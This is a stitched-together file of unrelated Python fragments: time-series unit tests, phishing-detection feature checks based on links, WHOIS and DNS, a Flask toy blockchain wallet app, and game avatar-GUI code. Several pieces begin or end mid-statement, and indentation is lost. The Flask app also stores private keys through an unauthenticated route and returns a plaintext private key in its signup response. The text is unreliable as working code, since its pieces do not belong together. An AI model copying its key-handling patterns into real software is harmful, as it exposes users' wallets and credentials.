TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList2:
series.pathExpression = series.name
expectedResult = [
TimeSeries('weightedAverage(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db5.load.value, collectd.test-db1.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, 1)',0,1,1,[0.75,1.5,1.5,2.0,5.0,4.5,7.0,8.0,6.75,7.5,8.25,12.0,9.75,14.0,15.0,16.0,17.0,12.0,9.5,10.0]),
]
result = functions.weightedAverage({}, seriesList, seriesList2, 1)
self.assertEqual(result, expectedResult)
def test_scaleToSeconds(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('scaleToSeconds(collectd.test-db1.load.value,30)',0,600,60,[0.5,1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db2.load.value,30)',0,600,60,[None,1.0,None,2.0,None,3.0,None,4.0,None,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db3.load.value,30)',0,600,60,[0.5,1.0,None,None,None,3.0,3.5,4.0,4.5,5.0]),
TimeSeries('scaleToSeconds(collectd.test-db4.load.value,30)',0,600,60,[0.5,1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,None]),
]
result = functions.scaleToSeconds({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_absolute(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('absolute(collectd.test-db1.load.value)',0,21,1,[10,9,8,7,None,5,4,3,2,1,0,1,2,3,4,5,6,7,8,9,10]),
]
self.assertEqual(functions.absolute({}, seriesList), expected)
def test_offset(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('offset(collectd.test-db1.load.value,10)',0,21,1,[0,1,2,3,None,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.offset({}, seriesList, 10), expected)
def test_offsetToZero(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,21,1,[-10,-9,-8,-7,None,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7,8,9,10]),
]
expected = [
TimeSeries('offsetToZero(collectd.test-db1.load.value)',0,21,1,[0,1,2,3,None,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.offsetToZero({}, seriesList), expected)
def test_derivative(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries('derivative(test)', 0, 600, 60, [None, None, 1, 1, 1, 1, None, None, 1, 1])]
result = functions.derivative({}, seriesList)
self.assertEqual(expected, result, 'derivative result incorrect')
def test_nonNegativeDerivative(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 3, 2, 1])]
expected = [TimeSeries('nonNegativeDerivative(test)', 0, 600, 60, [None, None, 1, 1, 1, 1, None, None, None, None])]
result = functions.nonNegativeDerivative({}, seriesList)
self.assertEqual(expected, result, 'nonNegativeDerivative result incorrect')
def test_nonNegativeDerivative_max(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 1, 2, 3, 4, 5, 0, 1, 2, 3])]
expected = [TimeSeries('nonNegativeDerivative(test)', 0, 600, 60, [None, 1, 1, 1, 1, 1, 1, 1, 1, 1])]
result = functions.nonNegativeDerivative({}, seriesList,5)
self.assertEqual(expected, result, 'nonNegativeDerivative result incorrect')
def test_perSecond(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 120, 240, 480, 960, 1920, 3840, 7680, 15360, 30720])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 2, 2, 4, 8, 16, 32, 64, 128, 256])]
result = functions.perSecond({}, seriesList)
self.assertEqual(expected, result, 'perSecond result incorrect')
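# perSecond divides each successive difference by the step (60s here), e.g. (120 - 0) / 60 = 2
# for the first computable point and (30720 - 15360) / 60 = 256 for the last one.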
totalLinks = 0
externalLinks = 0
m = []
for p in self.soup.find_all("img"):
if p.has_attr("src") and "http" in p.get("src")[:4]:
m.append(p.get('src'))
for p in self.soup.find_all("video"):
for q in p.find_all("source"):
if q.has_attr("src") and "http" in q.get("src")[:4]:
m.append(q.get('src'))
for p in self.soup.find_all("audio"):
for q in p.find_all("source"):
if q.has_attr("src") and "http" in q.get("src")[:4]:
m.append(q.get('src'))
for link in m:
if self.domain not in link:
externalLinks += 1
totalLinks += 1
if totalLinks != 0:
percentage = externalLinks / totalLinks
if percentage >= 0.61:
self.requestedWeight = 1
return
elif percentage >= 0.22:
self.requestedWeight = 0.5
return
self.requestedWeight = 0
return
def anchors_testing(self):
"""
test the percentage of anchors that point to external links
:return: None; sets self.anchorsWeight to 0, 0.5 or 1
"""
tags = self.soup.findAll("a", href=True)
anchors = []
for tag in tags:
anchors.append(tag.get("href"))
totalLink = len(anchors)
externalLinks = 0
for anchor in anchors:
if self.domain not in anchor:
if "www" in anchor[:3] or "http" in anchor[:4]:
externalLinks += 1
if externalLinks == 0 or externalLinks / totalLink < 0.31:
self.anchorsWeight = 0
return
elif externalLinks / totalLink <= 0.67:
self.anchorsWeight = 0.5
return
self.anchorsWeight = 1
return
def tags_links_testing(self):
"""
test the percentage of external links in meta, script and link tags
:return: None; sets tagWeight to 0, 0.5 or 1
"""
totalLinks = 0
externalLinks = 0
m = []
meta = self.soup.find_all("meta")
links = self.soup.find_all("link")
scripts = self.soup.find_all("script")
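# Collect every quoted absolute URL ("http...") found inside meta tags, plus href attributes of link and script tags.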
for tag in meta:
for link in re.findall(re.compile("\"http.*?\""), str(tag)):
m.append(link)
for tag in links:
if tag.has_attr("href") and "http" in tag.get("href")[:4]:
m.append(tag.get("href"))
for tag in scripts:
if tag.has_attr("href") and "http" in tag.get("href")[:4]:
m.append(tag.get("href"))
for link in m:
if self.domain not in link:
externalLinks += 1
totalLinks += 1
if totalLinks != 0:
percentage = externalLinks / totalLinks
if percentage >= 0.81:
self.tagWeight = 1
return
elif percentage >= 0.05:
self.tagWeight = 0.5
return
self.tagWeight = 0
return
def sfh_testing(self):
"""
test if the Server Form Handler of all forms is not suspicious
:return: None; sets SFHWeight to 0, 0.5 or 1
"""
for form in self.soup.find_all("form"):
if str(form.get("action")) == "":
self.SFHWeight = 1
return
elif str(form.get("action")) == "about:blank":
self.SFHWeight = 1
return
elif self.domain not in str(form.get("action")) and ("http" in str(form.get("action")) or "www" in str(
form.get("action"))):
self.SFHWeight = 0.5
return
self.SFHWeight = 0
return
def email_testing(self):
"""
test that no user information is sent by email
:return: None; sets emailWeight to 0 or 1
"""
# soup = BeautifulSoup(html, features="lxml")
if "mail(" in str(self.html).lower():
self.emailWeight = 1
return
elif "mailto:" in str(self.html).lower():
self.emailWeight = 1
return
self.emailWeight = 0
return
def abnormal_url_testing(self):
"""
test if registrant name is in the url
:return: None; sets abnormalWeight to 0 or 1
"""
if self.whoisDomain is not None:
domain = self.whoisDomain.domain.split(".")[0]
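# Compare each word of the WHOIS registrant organisation ("org"/"org1") with the second-level domain.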
if "org" in self.whoisDomain:
if type(self.whoisDomain["org"]) == list:
for org in self.whoisDomain["org"]:
for suborg in re.split(r"\. | ", org):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
elif self.whoisDomain["org"] is not None:
for suborg in re.split(r"\. | ", self.whoisDomain["org"]):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
if "org1" in self.whoisDomain:
if type(self.whoisDomain["org1"]) == list:
for org in self.whoisDomain["org1"]:
for suborg in re.split(r"\. | ", org):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
elif self.whoisDomain["org1"] is not None:
for suborg in re.split(r"\. | ", self.whoisDomain["org1"]):
if suborg.lower() in domain.lower():
self.abnormalWeight = 0
return
self.abnormalWeight = 1
return
def forwarding_testing(self):
"""
test the number of redirects (forwards) when requesting the URL
:return: None; sets forwardWeight to 0, 0.5 or 1
"""
try:
countForward = len(requests.get(self.http + "://" + self.url).history)
except requests.exceptions.ConnectionError:
try:
countForward = len(requests.get(self.http + "://" + self.url).history)
except requests.exceptions.ConnectionError:
return
if countForward <= 1:
self.forwardWeight = 0
return
if countForward < 4:
self.forwardWeight = 0.5
return
self.forwardWeight = 1
return
def bar_custom_testing(self):
"""
Check that the status bar is not abnormally modified via onmouseover handlers
:return: None; sets barCustomWeight to 0, 0.5 or 1
"""
for tag in self.soup.find_all(onmouseover=True):
if "window.status" in str(tag).lower():
self.barCustomWeight = 1
return
else:
self.barCustomWeight = 0.5
return
self.barCustomWeight = 0
return
def right_click_testing(self):
"""
test if the right click is not disabled
:return: None; sets rightClickWeight to 0 or 1
"""
if "contextmenu" in str(self.html).lower():
self.rightClickWeight = 1
return
self.rightClickWeight = 0
def popup_testing(self):
"""
test whether the page opens pop-ups (prompt/confirm/alert calls)
:return: None; sets popupWeight to 0, 0.5 or 1
"""
prompt = re.findall(r"prompt\(", str(self.html)) + re.findall(r"confirm\(", str(self.html)) + re.findall(
r"alert\(", str(self.html))
if prompt:
if len(prompt) > 3:
self.popupWeight = 1
return
if len(prompt) >= 1:
self.popupWeight = 0.5
return
self.popupWeight = 0
def iframe_testing(self):
"""
test whether the site uses external iframes
:return: None; sets iFrameWeight to 0 or 1
"""
for frame in self.soup.find_all("iframe"):
if frame.get("src") is not None and self.domain not in frame.get("src"):
if "www" in frame.get("src") or "http" in frame.get("src"):
self.iFrameWeight = 1
return
self.iFrameWeight = 0
def domain_age_testing(self):
"""
test the age of the domain (thresholds at one and three years)
:return: None; sets domainAgeWeight to 0, 0.5 or 1
"""
if self.whoisDomain is not None:
now = datetime.datetime.now()
creation = self.whoisDomain.creation_date
if type(creation) == list:
creation = creation[0]
try:
delta = now - creation
except:
self.domainAgeWeight = 0.5
return
if delta.days > 1095:
self.domainAgeWeight = 0
return
elif delta.days > 365:
self.domainAgeWeight = 0.5
return
else:
self.domainAgeWeight = 1
return
else:
self.domainAgeWeight = 1
def dns_record_testing(self):
"""
test whether the domain has NS records in DNS
:return: None; sets dnsWeight to 0 or 1
"""
if len(self.hostname.split("www.")) == 2:
domain = self.hostname.split("www.")[1]
else:
domain = self.hostname
try:
empty = True
resolver = dns.resolver.Resolver()
answer = resolver.query(domain, "NS")
i = 0
while empty and i < len(answer):
if answer[i].target != "":
empty = False
i += 1
except:
self.dnsWeight = 1
return
if not empty:
self.dnsWeight = 0
return
self.dnsWeight = 1
def traffic_testing(self):
"""
collect the website rank on AWIS database and test if it is not abnormal
:return: None; sets trafficWeight to 0, 0.5 or 1
"""
try:
soup = BeautifulSoup(self.amazonAlexa, features="lxml")
rank = int(soup.find("aws:trafficdata").find("aws:rank").contents[0])
except (AttributeError, IndexError):
try:
soup = BeautifulSoup(requests.get("https://www.alexa.com/siteinfo/" + self.domain).content,
features="lxml")
tag = soup.find(id="card_rank").find("", {"class": "rank-global"}).find("", {"class": "big data"})
rank = int("".join(re.findall('\d+', str(tag))))
except(AttributeError, IndexError):
self.trafficWeight = 1
return
if rank > 100000:
self.trafficWeight = 0.5
return
self.trafficWeight = 0
def page_rank_testing(self):
"""
Test the pagerank of the domain
:return: None; sets pageRankWeight to 0, 0.5 or 1
"""
if self.pageRank <= 2:
self.pageRankWeight = 1
return
elif self.pageRank <= 4:
self.pageRankWeight = 0.5
else:
self.pageRankWeight = 0
return
def google_index_testing(self):
"""
test if url is indexed by google
:return: None; sets indexingWeight to 0 or 1
"""
index = googleApi.google_search("site:" + self.url)
if index:
self.indexingWeight = 0
return
self.indexingWeight = 1
def links_pointing_to_testing(self):
"""
collect the number of sites linking to the URL from the AWIS database and test whether it is abnormally low
:return: None; sets linksWeight to 0, 0.5 or 1
"""
soup = BeautifulSoup(self.amazonAlexa, features="lxml")
try:
countLinks = int(soup.find("aws:linksincount").contents[0])
except (AttributeError, IndexError):
try:
soup = BeautifulSoup(requests.get("https://www.alexa.com/siteinfo/" + self.url).content,
features="lxml")
countLinks = int(
"".join(soup.find("", {"class": "linksin"}).find("", {"class": "big data"}).get_text().split(",")))
except(AttributeError, IndexError):
self.linksWeight = 1
return
if countLinks < 5:
self.linksWeight = 1
return
elif countLinks < 30:
self.linksWeight = 0.5
return
self.linksWeight = 0
def statistic_report_testing(self):
"""
test if the ip address of the domain is in top 50 of www.stopbadware.org
:return: None; sets statisticWeight to 0 or 1
"""
try:
IPdomain = socket.gethostbyname(self.hostname)
except socket.gaierror:
self.statisticWeight = 0
return
jsonDictIP = json.loads(
requests.post("https://www.stopbadware.org/sites/all/themes/sbw/clearinghouse.php",
data={'q': 'tops'}).text)
IPList = []
for site in jsonDictIP['top_ip']:
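# ip_addr comes back as an unsigned 32-bit integer; pack it big-endian and convert it to dotted-quad notation.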
IPList.append(socket.inet_ntoa(struct.pack('!L', int(site['ip_addr']))))
for ip in IPList:
if ip == IPdomain:
self.statisticWeight = 1
return
self.statisticWeight = 0
def sub_domain_length_testing(self):
"""
Calculate the weight from the mean length of the subdomain labels
:return:
"""
domain = self.hostname
psl = PublicSuffixList()
psl.accept_unknown = False
if domain is None:
domain = ""
else:
try:
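# Strip the public suffix (and its leading dot) so only the registrable and sub-domain labels remain.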
domain = domain[:len(domain) - (len(psl.publicsuffix(domain)) + 1)]
except TypeError:
pass
subdomains = domain.split(".")
total = 0
for subdomain in subdomains:
total += len(subdomain)
if total / len(subdomains) > 15:
self.subDomainLengthWeight = 1
return
elif total / len(subdomains) > 9:
self.subDomainLengthWeight = 0.5
return
self.subDomainLengthWeight = 0
def www_testing(self):
"""
test if www is at the beginning of url
:return:
"""
if "www" in self.url[:11]:
self.wwwWeight = 0
return
self.wwwWeight = 1
def valid_tld_testing(self):
"""
test if the tld of url is valid
:return:
"""
psl = PublicSuffixList()
psl.accept_unknown = False
if psl.publicsuffix(self.hostname) is None:
self.validTldWeight = 1
return
self.validTldWeight = 0
from flask import Flask, render_template, request, redirect, url_for, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from werkzeug.utils import secure_filename
import os
import json
import mining
with open("info.json", "r") as c:
parameters = json.load(c)["parameters"]
app = Flask(__name__)
# Project specific configuration
app.config['SQLALCHEMY_DATABASE_URI'] = parameters["database"]
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = parameters["track_modifications"]
app.config['SECRET_KEY'] = parameters["secret_key"]
app.config['UPLOAD_FOLDER'] = parameters["UPLOAD_FOLDER"]
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
gas_price_minting = 2
addres_key_admin = "0x9109C4575a824535bAc4efA008Ed4E81DFf8755E"
class Blockchain(db.Model):
id = db.Column(db.Integer, primary_key = True)
desc_transfer = db.Column(db.String(512), nullable = False)
prev_hash = db.Column(db.String(512), nullable = False)
sender_id = db.Column(db.String(512), nullable = False)
reciver_id = db.Column(db.String(512), nullable = False)
transaction_amt = db.Column(db.Float, nullable = False)
new_hash = db.Column(db.String(512), nullable = False)
addres_key_miner = db.Column(db.String(512), nullable = False)
nonce = db.Column(db.Integer, nullable = False)
def __repr__(self):
return str(self.id) + ': New Hash: ' + self.new_hash + ' Previous Hash: ' + self.prev_hash + ' '
class Blockchain_Waiting(db.Model):
id = db.Column(db.Integer, primary_key = True)
desc_transfer = db.Column(db.String(512), nullable = False)
sender_id = db.Column(db.String(512), nullable = False)
reciver_id = db.Column(db.String(512), nullable = False)
transaction_amt = db.Column(db.Float, nullable = False)
def __repr__(self):
return str(self.id) + ': ' + ' transaction_amt: ' + str(self.transaction_amt)
class Keys(db.Model):
id = db.Column(db.Integer, primary_key = True)
private_key = db.Column(db.String(512), nullable = False)
addres_key = db.Column(db.String(512), nullable = False)
def __repr__(self):
return str(self.id) + ': Addres: ' + self.addres_key
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(512), nullable = False)
dob = db.Column(db.String(512), nullable = False)
addres_key = db.Column(db.String(512), nullable = False)
private_key = db.Column(db.String(512), nullable = False)
pan_no = db.Column(db.String(512), nullable = False)
mobile_no = db.Column(db.String(512), nullable = False)
current_balance = db.Column(db.Float, default = 0, nullable = False)
miner_status = db.Column(db.Boolean, default = False, nullable = False)
loan_status = db.Column(db.Boolean, default = False, nullable = False)
loan_taken = db.Column(db.Boolean, default = False, nullable = False)
blocks_mined = db.Column(db.Integer, default = 0, nullable = False)
wallet_balance = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ': Addres : ' + self.addres_key + ' Miner status: ' + str(self.miner_status) + ' Name: ' + str(self.name)
class Crowdsourcing(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
problem_desc = db.Column(db.Text(), nullable=False)
title_desc = db.Column(db.String(512), nullable=False)
target_required = db.Column(db.Float, nullable=False)
def __repr__(self):
return str(self.id) + ': Addres : ' + self.addres_key + ' title_desc: ' + self.title_desc
class Nfts(db.Model):
id = db.Column(db.Integer, primary_key=True)
hash_nft = db.Column(db.String(512), nullable = False)
location_addres = db.Column(db.String(512), nullable=False)
addres_owner = db.Column(db.String(512), nullable=False)
tittle_nft = db.Column(db.String(512), nullable=False)
desc_nft = db.Column(db.Text(), nullable=False)
price_nft = db.Column(db.Float, default = 1, nullable = False)
def __repr__(self):
return str(self.id) + ': Hash of nft: ' + str(self.hash_nft) + ' price: ' + str(self.price_nft) + ' tittle_nft: ' + str(self.tittle_nft)
class MakeModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
no_of_hash = db.Column(db.Integer, nullable=False)
no_of_blocks_mined = db.Column(db.Integer, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ' Addres of the Miner ' + self.addres_key + ' no_of_hash: ' + str(self.no_of_hash) + ' no_of_blocks_mined: ' + str(self.no_of_blocks_mined)
class LoanStats(db.Model):
id = db.Column(db.Integer, primary_key=True)
addres_key = db.Column(db.String(512), nullable=False)
amt_on_loan = db.Column(db.Float, nullable=False)
amt_paid = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ' addres_key: ' + str(self.addres_key) + ' amt_on_loan: ' + str(self.amt_on_loan) + ' amt_paid: ' + str(self.amt_paid)
class CoinManager(db.Model):
id = db.Column(db.Integer, primary_key = True)
addres_key = db.Column(db.String(512), nullable = False)
private_key = db.Column(db.String(512), nullable = False)
total_coin = db.Column(db.Float, default = 0, nullable = False)
total_given = db.Column(db.Float, default = 0, nullable = False)
total_money_in_network = db.Column(db.Float, default = 0, nullable = False)
total_given_to_miners = db.Column(db.Float, default = 0, nullable = False)
def __repr__(self):
return str(self.id) + ': Total coin in network: ' + str(self.total_coin) + ' Total coin bought: ' + str(self.total_given) + ' Total Mine reward: ' + str(self.total_given_to_miners)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
@app.route('/', methods = ['GET', 'POST'])
def index():
if request.method == 'POST':
private_key = request.form.get('private_key')
addres_key = request.form.get('addres_key')
if private_key and addres_key:
add_key = Keys(private_key = private_key, addres_key = addres_key)
db.session.add(add_key)
db.session.commit()
return render_template('admin.html', msg = jsonify({'addres_key': addres_key,
'private_key' : private_key}))
keys = Keys.query.all()
return render_template('admin.html', keys = keys)
@app.route('/genesis', methods = ['GET', 'POST'])
def genesis():
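# Hard-coded genesis block: the previous/new hashes are fixed seed values rather than computed at runtime.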
block = Blockchain(desc_transfer = "This is Genesis Block", prev_hash = '0c08c0d223af7f43cbf3543b4a3559cd0cc0b37893c38a2fc8319e204e80c2c2', sender_id = 'genesis', reciver_id = 'genesis', transaction_amt = float(1000), new_hash = '5957b313c1653a9fdf97e25373bd7641a456e4d75789110c7092a71a03a67c33', addres_key_miner = 'genesis', nonce = 1 )
db.session.add(block)
db.session.commit()
return jsonify({'Successful': 'genesis block added'})
@app.route('/checkblockchain', methods = ['GET', 'POST'])
def checkblockchain():
blocks = Blockchain.query.all()
for i in blocks:
prev_hash_check, new_hash_check, nonce = mining.checkchain(i)
if not (i.prev_hash == prev_hash_check and i.new_hash == new_hash_check and i.nonce == nonce):
return jsonify({'error': 'Block ' + str(i.id) + ' failed verification!'})
return jsonify({'Yay': 'All the blocks are valid! Thanks for checking!'})
@app.route('/signup', methods = ['GET', 'POST'])
def signup():
if request.method == 'POST':
name = request.form.get('name')
dob = request.form.get('dob')
miner_status = request.form.get('miner_status')
pan_no = request.form.get('pan_no')
mobile_no = request.form.get('mobile_no')
blockkey = Keys.query.all()[0]
addres_key, private_key = blockkey.addres_key, blockkey.private_key
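# Only a hash of the private key is persisted (mining.SHA256 is assumed to return a hex digest string).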
if miner_status == 'Yes':
temp_priv = mining.SHA256(blockkey.private_key)
new_user = User(name = name, dob = dob, miner_status = True, addres_key = addres_key, private_key = temp_priv, pan_no = pan_no, mobile_no = mobile_no)
elif miner_status == 'No':
temp_priv = mining.SHA256(blockkey.private_key)
new_user = User(name = name, dob = dob, miner_status = False, addres_key = addres_key, private_key = temp_priv, pan_no = pan_no, mobile_no = mobile_no)
block_remove = Keys.query.get_or_404(blockkey.id)
db.session.delete(block_remove)
db.session.add(new_user)
db.session.commit()
return jsonify({'Keep Your details safe:':'We provide you with this message so that you can safely store your private key',
'Caution': 'We do not know your private key; it is hashed and stored in the database, please keep it safe',
'name': name,
'dob': dob,
'miner_status': miner_status,
'addres_key': addres_key,
'private_key': private_key,
'pan_no': pan_no,
'mobile_no': mobile_no,})
return render_template('login.html')
@app.route('/login', methods = ['GET', 'POST'])
def login():
if request.method == 'POST':
name = request.form.get('name')
private_key = request.form.get('private_key')
pos_users = User.query.filter_by(name = name)
private_key = mining.SHA256(private_key)
for i in pos_users:
if i.name == name and i.private_key == private_key:
user = User.query.get(i.id)
load_user(user.id)
login_user(user)
return redirect('http://127.0.0.1:3000/')
return redirect('http://127.0.0.1:3000/')
# return render_template('login.html')
@app.route('/signout', methods = ['GET', 'POST'])
@login_required
def signout():
logout_user()
return redirect(url_for('login'))
@app.route('/makepayment', methods = ['GET', 'POST'])
@login_required
def makepayment():
if request.method == 'POST':
amount = request.form.get('amount')
addres_key = request.form.get('addres_key')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.private_key == private_key and current_user.current_balance >= float(amount):
if current_user.addres_key == addres_key:
return jsonify({'error': "You can't send money to yourself"})
if float(amount) <= 0:
return jsonify({'error': "Amount can't be zero or negative"})
block_waiting = Blockchain_Waiting(desc_transfer = 'User Transaction', sender_id = private_key, reciver_id = addres_key, transaction_amt = float(amount))
db.session.add(block_waiting)
db.session.commit()
return redirect('http://127.0.0.1:3000/')
return redirect('http://127.0.0.1:3000/')
@app.route('/addfunds', methods = ['GET', 'POST'])
@login_required
def addfunds():
if request.method == 'POST':
amount = request.form.get('amount')
amount_inr = request.form.get('amount_inr')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.private_key == private_key:
current_user.current_balance = current_user.current_balance + float(amount)
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance -= float(amount)
coin = CoinManager.query.all()[0]
coin.total_given += float(amount)
coin.total_money_in_network += float(amount_inr)
db.session.commit()
return redirect(url_for('makepayment'))
else:
return jsonify({'error':'enter correct privatekey'})
return render_template('index.html')
@app.route('/sellfunds', methods = ['GET', 'POST'])
@login_required
def sellfunds():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if float(amount) >= (current_user.current_balance)*0.5:
return jsonify({'error':'Exceeding the transaction limit'})
if current_user.private_key == private_key:
current_user.current_balance -= float(amount)
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance += float(amount)
db.session.commit()
return jsonify({'yay':'You successfully sold the coins!'})
else:
return jsonify({'error':'Enter correct Private Key'})
return render_template('index.html')
@app.route('/getloan', methods = ['GET', 'POST'])
@login_required
def getloan():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if current_user.current_balance <= float(amount):
return jsonify({'error': "We can't provide a loan greater than your worth!"})
if (current_user.current_balance)*0.5 >= float(amount):
current_user.current_balance += float(amount)
current_user.loan_status = True
# loan_taken is declared as a Boolean column, so just flag that a loan is outstanding
current_user.loan_taken = True
admin_acc = User.query.filter_by(addres_key = addres_key_admin)[0]
admin_acc.current_balance -= float(amount)
loan_status = LoanStats(addres_key = current_user.addres_key, amt_on_loan = float(amount))
db.session.add(loan_status)
db.session.commit()
return jsonify({'Yay':'Loan was successfully granted',
'Amount': amount})
else:
return jsonify({'error':'You are not eligible for a loan'})
return render_template('loan.html')
@app.route('/payloan', methods = ['GET', 'POST'])
@login_required
def payloan():
if request.method == 'POST':
amount = request.form.get('amount')
private_key = request.form.get('private_key')
private_key = mining.SHA256(private_key)
if float(amount) and current_user.private_key == private_key:
current_user.current_balance -= float(amount)
current_user.loan_status = True
current_user.loan_taken
self.avatarType == AVATAR_PIRATE:
if self.shop == BODYSHOP:
self.makeRandomBody()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == MOUTHSHOP:
self.makeRandomMouth()
elif self.shop == EYESSHOP:
self.makeRandomEyes()
elif self.shop == NOSESHOP:
self.makeRandomNose()
elif self.shop == EARSHOP:
self.makeRandomEar()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
elif self.shop == CLOTHESSHOP:
self.makeRandomClothing()
elif self.shop == NAMESHOP:
self.makeRandomName()
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.randomPick()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.makeRandomBody()
self.makeRandomHead()
self.makeRandomHair()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
def handleReset(self):
if self.avatarType == AVATAR_PIRATE:
if self.shop == BODYSHOP:
if self.pirate.style.gender == 'm':
self.resetGender(0)
else:
self.resetGender(1)
self.resetBody()
elif self.shop == HEADSHOP:
self.resetHead()
elif self.shop == MOUTHSHOP:
self.resetMouth()
elif self.shop == EYESSHOP:
self.resetEyes()
elif self.shop == NOSESHOP:
self.resetNose()
elif self.shop == EARSHOP:
self.resetEar()
elif self.shop == HAIRSHOP:
self.resetHair()
elif self.shop == CLOTHESSHOP:
self.resetClothing()
elif self.shop == NAMESHOP:
self.resetName()
elif self.shop == TATTOOSHOP:
self.resetTattoo()
elif self.shop == JEWELRYSHOP:
self.resetJewelry()
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.reset()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.resetBody()
self.resetHead()
self.resetHair()
elif self.shop == HEADSHOP:
self.resetHead()
elif self.shop == HAIRSHOP:
self.resetHair()
def addPage(self, pageName = 'Page'):
self.addPageTab(pageName)
def addPageTab(self, pageName = 'Page'):
tabIndex = len(self.pageTabs)
def goToPage():
self.setPage(pageName)
yOffset = 0.695 - 0.325 * len(self.pageTabs)
tabText = pageName
icon = '**/' + MakeAPiratePageIcons[pageName]
icon_down = '**/' + MakeAPiratePageIcons[pageName] + '_over'
icon_over = '**/' + MakeAPiratePageIcons[pageName] + '_over'
pageTab = DirectButton(parent = self.bookModel, relief = None, image = (self.charGui.find('**/chargui_frame02'), self.charGui.find('**/chargui_frame02_down'), self.charGui.find('**/chargui_frame02_over')), geom = (self.charGui.find(icon), self.charGui.find(icon_down), self.charGui.find(icon_over)), pos = (-1.475, 0, yOffset), scale = 0.87, command = goToPage)
self.pageNames.append(pageName)
self.pageTabs.append(pageTab)
def setPage(self, pageName):
nextPageIndex = self.pageNames.index(pageName)
if self.currPageIndex is not None:
if self.currPageIndex == nextPageIndex:
return None
messenger.send(ShopNames[self.currPageIndex] + '-done')
self.pgsRotate.setValue(0)
self.currPageIndex = self.pageNames.index(pageName)
self.setPageTabIndex(self.currPageIndex)
self.request(ShopNames[self.currPageIndex])
def setPageTabIndex(self, pageTabIndex):
if self.currPageTabIndex is not None and pageTabIndex != self.currPageTabIndex:
self.pageTabs[self.currPageTabIndex].clearColorScale()
self.currPageTabIndex = pageTabIndex
self.pageTabs[self.currPageTabIndex].setColorScale(1, 1, 0.5, 1)
def showPageTabs(self):
for i in range(0, len(self.pageTabs)):
self.pageTabs[i].show()
